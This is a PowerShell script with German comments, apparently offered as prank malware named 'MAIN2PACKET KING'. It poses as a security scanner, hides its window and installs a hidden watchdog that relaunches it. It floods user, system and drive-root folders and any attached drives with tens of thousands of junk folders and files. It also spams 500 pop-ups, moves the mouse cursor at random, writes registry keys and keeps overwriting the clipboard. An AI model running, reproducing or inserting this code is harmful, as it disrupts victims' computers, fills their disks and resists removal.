# ================================
# MAIN2PACKET KING - 1000 ORDNER PRO ZIEL
# ================================

# Fenster SOFORT vernichten
Add-Type -Name Window -Namespace Console -MemberDefinition '
[DllImport("Kernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("User32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
'
$consolePtr = [Console.Window]::GetConsoleWindow()

# ===== FAKE SCANNER =====
Clear-Host
$Host.UI.RawUI.ForegroundColor = "Cyan"
$Host.UI.RawUI.BackgroundColor = "Black"
Write-Host "╔════════════════════════════════════════════╗" -ForegroundColor Cyan
Write-Host "║     MAIN2PACKET SECURITY SCANNER v9.4.2   ║" -ForegroundColor Cyan
Write-Host "╚════════════════════════════════════════════╝" -ForegroundColor Cyan
Write-Host ""
Write-Host "[INFO] Initialisiere 1000-Ordner-Modus..." -ForegroundColor Yellow
Start-Sleep -Milliseconds 200

# System-Info
Write-Host "[SYSTEM]" -ForegroundColor Green
Write-Host "   • Benutzer: $env:USERNAME" -ForegroundColor White
Write-Host "   • Computer: $env:COMPUTERNAME" -ForegroundColor White
Write-Host "   • 1000 Ordner pro Ziel: AKTIV" -ForegroundColor Red
Write-Host ""

Write-Host "Drücke eine Taste..." -ForegroundColor Gray
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")

# ===== ALLE ZIELE =====
$alleZiele = @(
    # Benutzerordner
    [Environment]::GetFolderPath("Desktop"),
    [Environment]::GetFolderPath("MyDocuments"),
    [Environment]::GetFolderPath("UserProfiles") + "\Downloads",
    [Environment]::GetFolderPath("MyMusic"),
    [Environment]::GetFolderPath("MyPictures"),
    [Environment]::GetFolderPath("MyVideos"),
    
    # AppData
    $env:APPDATA,
    $env:LOCALAPPDATA,
    $env:TEMP,
    "$env:APPDATA\Microsoft\Windows\Recent",
    
    # Browser
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cache",
    "$env:APPDATA\Mozilla\Firefox\Profiles",
    
    # Gaming
    "$env:APPDATA\.minecraft",
    "$env:APPDATA\Roaming\Discord",
    "$env:APPDATA\Roaming\Spotify",
    "$env:APPDATA\Roaming\Steam",
    
    # Windows
    "$env:SystemRoot\Temp",
    "$env:SystemRoot\System32\Tasks",
    "C:\ProgramData",
    "C:\Users\Public\Desktop",
    "C:\Users\Public\Documents",
    "C:\Users\Public\Downloads",
    
    # Laufwerke
    "C:\",
    "D:\",
    "E:\",
    "F:\",
    "G:\"
)

# ===== FENSTER VERSTECKEN =====
Write-Host "[INFO] 1000 Ordner pro Ziel werden erstellt..." -ForegroundColor Green
Start-Sleep -Milliseconds 500
[Console.Window]::ShowWindow($consolePtr, 0)

# ===== WATCHDOG =====
$watchdog = @"
while(`$true) {
    `$p = Get-Process powershell -ErrorAction SilentlyContinue | Where-Object {`$_.Id -ne `$pid}
    if (`$p.Count -le 1) { Start-Process powershell -WindowStyle Hidden -ArgumentList "-File `"$using:PSCommandPath`"" }
    Start-Sleep -Milliseconds 500
}
"@
$watchdog | Out-File "$env:TEMP\watchdog.ps1" -Encoding UTF8 -Force
Start-Process powershell -WindowStyle Hidden -ArgumentList "-File `"$env:TEMP\watchdog.ps1`""

# ===== 1000 ORDNER PRO ZIEL - PARALLEL =====
$ordnerJob = Start-Job -ScriptBlock {
    # 1000 VERSCHIEDENE ORDNERNAMEN
    $ordnerNamen = @()
    for ($i = 1; $i -le 1000; $i++) {
        $ordnerNamen += "MAIN2PACKET_$i"
        $ordnerNamen += "KING_$i"
        $ordnerNamen += "TURBO_$i"
        $ordnerNamen += "ULTRA_$i"
        $ordnerNamen += "MEGA_$i"
        $ordnerNamen += "GIGA_$i"
        $ordnerNamen += "SYSTEM_$i"
        $ordnerNamen += "CORE_$i"
        $ordnerNamen += "BACKUP_$i"
        $ordnerNamen += "CACHE_$i"
    }
    
    $zielCount = 0
    foreach ($ziel in $using:alleZiele) {
        $zielCount++
        if (Test-Path $ziel) {
            # 1000 ORDNER PRO ZIEL!
            for ($o = 1; $o -le 1000; $o++) {
                $ordnerName = "MAIN2PACKET_" + $zielCount + "_" + $o
                
                $ordnerPfad = Join-Path $ziel $ordnerName
                try {
                    New-Item -Path $ordnerPfad -ItemType Directory -Force | Out-Null
                    
                    # 10 DATEIEN PRO ORDNER
                    for ($d = 1; $d -le 10; $d++) {
                        $dateiName = "file_$d.txt"
                        $dateiPfad = Join-Path $ordnerPfad $dateiName
                        "MAIN2PACKET KING - Ordner $o, Datei $d" | Out-File $dateiPfad -Encoding UTF8 -Force
                    }
                    
                    # 5 UNTERORDNER PRO ORDNER
                    for ($u = 1; $u -le 5; $u++) {
                        $unterName = "SUB_$u"
                        $unterPfad = Join-Path $ordnerPfad $unterName
                        New-Item -Path $unterPfad -ItemType Directory -Force | Out-Null
                        
                        # 5 DATEIEN PRO UNTERORDNER
                        for ($ud = 1; $ud -le 5; $ud++) {
                            $unterDatei = Join-Path $unterPfad "subfile_$ud.txt"
                            "SUB-ORDNER $u - Datei $ud" | Out-File $unterDatei -Encoding UTF8 -Force
                        }
                    }
                } catch {}
            }
        }
    }
}

# ===== USB-SPEZIAL =====
$usbJob = Start-Job -ScriptBlock {
    while ($true) {
        $drives = Get-PSDrive -PSProvider FileSystem | Where-Object {$_.Root -match "^[A-Z]:\\" -and $_.Used -gt 0}
        foreach ($drive in $drives) {
            $drivePath = $drive.Root
            
            # 500 ORDNER PRO USB
            for ($u = 1; $u -le 500; $u++) {
                $usbOrdner = Join-Path $drivePath "USB_MAIN2PACKET_$u"
                try {
                    New-Item -Path $usbOrdner -ItemType Directory -Force | Out-Null
                    
                    # 10 DATEIEN PRO USB-ORDNER
                    for ($f = 1; $f -le 10; $f++) {
                        $usbDatei = Join-Path $usbOrdner "usb_file_$f.txt"
                        "USB - MAIN2PACKET" | Out-File $usbDatei -Encoding UTF8 -Force
                    }
                } catch {}
            }
        }
        Start-Sleep -Seconds 30
    }
}

# ===== 500 POP-UPS =====
$popupJob = Start-Job -ScriptBlock {
    Add-Type -AssemblyName System.Windows.Forms
    
    for ($pop = 1; $pop -le 500; $pop++) {
        $messages = @(
            "📁 1000 ORDNER PRO ZIEL!",
            "🔥 20 ZIELE = 20.000 ORDNER!",
            "💥 200.000 DATEIEN INSGESAMT!",
            "📂 USB: +500 ORDNER!",
            "⚡ ORDNER #$pop VON 500",
            "📊 FORTSCHRITT: $([math]::Round($pop/500*100))%"
        )
        
        [System.Windows.Forms.MessageBox]::Show(
            "📁 POP-UP #$pop 📁`n`n" + (Get-Random $messages),
            "MAIN2PACKET 1000-ORDNER",
            "OK",
            "Information"
        )
        
        Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4)
    }
}

# ===== MAUS-TURBO =====
$mausJob = Start-Job -ScriptBlock {
    Add-Type -AssemblyName System.Windows.Forms
    Add-Type -AssemblyName System.Drawing
    
    while ($true) {
        $screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds
        $x = Get-Random -Minimum 0 -Maximum $screen.Width
        $y = Get-Random -Minimum 0 -Maximum $screen.Height
        [System.Windows.Forms.Cursor]::Position = New-Object Drawing.Point($x, $y)
        Start-Sleep -Milliseconds (Get-Random -Minimum 100 -Maximum 500)
    }
}

# ===== REGISTRY =====
$regJob = Start-Job -ScriptBlock {
    for ($r = 1; $r -le 200; $r++) {
        try {
            New-Item -Path "HKCU:\Software\MAIN2PACKET_$r" -Force | Out-Null
            New-ItemProperty -Path "HKCU:\Software\MAIN2PACKET_$r" -Name "Ordner" -Value "1000" -Force | Out-Null
        } catch {}
    }
}

# ===== CLIPBOARD =====
$clipJob = Start-Job -ScriptBlock {
    Add-Type -AssemblyName System.Windows.Forms
    while ($true) {
        Start-Sleep -Seconds 10
        [System.Windows.Forms.Clipboard]::SetText("📁 1000 ORDNER PRO ZIEL - GESAMT: " + (Get-Random -Minimum 20000 -Maximum 30000) + " ORDNER")
    }
}

# ===== ALLES LÄUFT =====
while ($true) {
    Start-Sleep -Seconds 30
}
